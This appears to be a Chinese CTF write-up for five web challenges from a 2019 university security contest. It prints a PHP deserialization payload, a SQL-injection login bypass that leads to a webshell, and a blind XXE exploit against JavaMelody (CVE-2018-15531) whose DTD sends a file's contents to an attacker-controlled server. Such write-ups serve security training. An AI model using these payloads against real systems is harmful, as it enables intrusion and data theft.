文章首发于安恒网络空间安全讲武堂

img

“东南大学永信杯”江苏大学生网络安全精英邀请赛 2019/4/13 9:00-17:00

Web1 judge 100pt

just do it!

http://211.65.197.117:15000

img

Payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import re
import time
import requests

url = 'http://211.65.197.117:15000/'
r = requests.session()
for i in range(20):
text = r.get(url).text
calc = str(re.findall("\n<div>(.*?)=", text))[2:-2].replace(' ', '')
res = str(re.findall("=(.*?)</div>", text))[2:-2]
res = int(res)
ans = eval(calc)
if ans == res:
data = {'answer': "true"}
elif ans != res:
data = {'answer': "false"}
time.sleep(1)
last = r.post(url, data)
print(last.text)
'''SUSCTF{python_1s_th3_be3t_l4ngu4ge}'''

Web2 phpStorm 100pt

好的编辑器开发真的很快!!http://sus.njnet6.edu.cn:11002

img

phpStorm猜测.idea文件泄露,下载workspace.xml分析文件路径,访问Thi5_tru3_qu3sti0n.php(依照引导使用BurpSuite`抓包修改Head头X-Forward-For为127.0.0.1、User-Agent为SUS进行绕过)获取到php代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
/**
* Created by PhpStorm.
* User: y4ngyy
* Date: 19-3-19
* Time: 下午2:40
*/
class foo {
public $filename;
function printContent() {
$content = file_get_contents($this->filename);
echo $content;
}
}
if ($_SERVER['HTTP_X_FORWARDED_FOR'] != '127.0.0.1') {
echo 'Only Localhost can see';
die();
} else if ($_SERVER['HTTP_USER_AGENT'] != 'SUS') {
echo 'Browser is not SUS<br>';
echo 'Please use SUS browser!';
die();
}
show_source(__FILE__);


$a = null;
if (isset($_POST['foo'])) {
$a = unserialize($_POST['foo']);
if (!is_object($a)||get_class($a) != 'foo') {
$a = new foo();
$a->filename = "text.txt";
}

} else {
$a = new foo();
$a->filename = "text.txt";
}
$a->printContent();
Hello, CTFer!
?>

简单的PHP反序列化,Payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
class foo {
public $filename;
function printContent() {
$content = file_get_contents($this->filename);
echo $content;
}
}

$a = new foo();
$a->filename = "flag.php";
echo serialize($a);

//O:3:"foo":1:{s:8:"filename";s:8:"flag.php";}
//escape()->O%3A3%3A%22foo%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3B%7D

提交foo后查看网页源代码,发现如下内容:

1
2
3
4
5
6
7
8
9
//view-source:http://sus.njnet6.edu.cn:11002/Thi5_tru3_qu3sti0n.php
<?php
/**
* Created by PhpStorm.
* User: y4ngyy
* Date: 19-3-19
* Time: 下午2:38
*/
//SUSCTF{PHPSTORM_1s_pR3tty_useFul};?>

Web3 infoGate 300pt

信息门户??http://sus.njnet6.edu.cn:11001

img

username=admin' or '1'='1&password=1即可以admin的身份登录,进入edit.php写入shell~

img

访问/Uploads/webshell.php得到:SUSCTf{infoGate_Pr3tty_easy_T0_GETSHELL}.

Web4 Melody 300pt

所以这题为什么叫这个名字?http://211.65.197.117:23333

JavaMelody是一个用来对Java应用进行监控的组件。通过该组件,用户可以对内存、CPU、用户session甚至SQL请求等进行监控,并且该组件提供了一个可视化界面给用户使用。

img

访问/monitoring可以验证是否加载成功插件:

img

系 javaMelody XXE(CVE-2018-15531) ,参见复现分析JavaMelody 组件 XXE 漏洞解析. Payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
//http://211.65.197.117:23333/
POST / HTTP/1.1
Host: 211.65.197.117:23333
Content-type: text/xml
SOAPAction: aaaaa
Content-Length: 154

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://your_vps_adress:port/ev.dtd">
%remote;
]>
</root>

这里直接响应是没有回显的,为了完成盲打(Blind XXE)读取文件的功能,服务器部署文件ev.dtd

1
2
3
4
5
//ev.dtd
<!ENTITY % payload SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://your_vps_adress:port/%payload;'>">
%int;
%trick;

捕获记录:

1
211.65.197.117 - - [13/Apr/2019:15:53:02 +0800] "GET /SUSCTF{M3l0dy_CV3_XX3} HTTP/1.1" 404 162 "-" "Java/1.8.0_201"

Web5 重定向之旅 300pt

使用谷歌内核浏览器食用效果更佳。 http://sus.njnet6.edu.cn:65533

img

  • Part1 查看源代码获取注释代码

img

1
2
3
4
//url:http://sus.njnet6.edu.cn:65533/index-ein.html
//hint:源代码的秘密
<meta http-equiv="refresh" content="6;url=index-dos.php">
<!--<?php $part1="3oI";?>-->
  • Part2 在HTTP请求报文头里捕获

img

网页很快重定向跳转,这里我们可以用BurpSuite抓包查看响应包内容。

1
2
3
//http://sus.njnet6.edu.cn:65533/index-dos.php
//hint: HEAD 你摸得到头脑吗?
$part2: rEdirEct
  • Part3 解AAencode JS加密

img

1
2
3
4
5
6
7
//http://sus.njnet6.edu.cn:65533/index-trois.aspx
//http://sus.njnet6.edu.cn:65533/index-ne.js
//JS AAencode 解密如下
leave=function ()
{console.log("$part3:4fun");
location.href='flag.php';
location.href='no_flag.html';}
  • 访问flag.php
1
2
3
4
5
6
7
8
//http://sus.njnet6.edu.cn:65533/flag.php
SUSCTF{__}
<?php
error_reporting(0);
echo "SUSCTF{".$part1."_".$part2."_".$part3."}";
echo "<br>";
show_source(__FILE__);
?>

拼接flag得到SUSCTF{3oI_rEdirEct_4fun}.